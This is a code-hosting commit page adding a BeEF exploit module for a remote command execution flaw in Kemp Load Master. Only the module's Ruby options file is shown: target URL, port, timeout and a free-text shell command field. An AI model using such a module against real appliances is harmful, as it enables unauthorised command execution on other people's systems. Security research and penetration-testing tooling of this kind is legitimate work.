Hiddenden/beef
2
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Kemp Load Master RCE - BeEF module

Browse Source 
This is a new module for BeEF to exploit a RCE vulnerability in Kemp
Load Master load balancer. More information on this blog post:
http://blog.malerisch.net/2015/04/playing-with-kemp-load-master.html
This commit is contained in:
Roberto Suggi Liverani
2015-04-01 22:14:35 +02:00
parent 05e31fd250
commit 4c7aa8f677
3 changed files with 74 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files

22
modules/exploits/kemp_command_execution/module.rb Normal file
View File

@@ -0,0 +1,22 @@
#
# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
class Kemp_command_execution < BeEF::Core::Command
def self.options
return [
{'name'=>'rhost', 'ui_label' => 'URL', 'value' => 'https://x.x.x.x'},
{'name'=>'rport', 'ui_label' => 'Remote Port', 'value' => '443'},
{'name'=>'timeout', 'ui_label' => 'Timeout (s)', 'value' => '15'},
{'name'=>'cmd', 'ui_label' => 'Command', 'description' => 'Enter shell command to execute.', 'type'=>'textarea', 'value'=>"ls", 'width'=>'200px' },
]
end
def post_execute
save({'result' => @datastore['result']}) if not @datastore['result'].nil?
save({'fail' => @datastore['fail']}) if not @datastore['fail'].nil?
end
end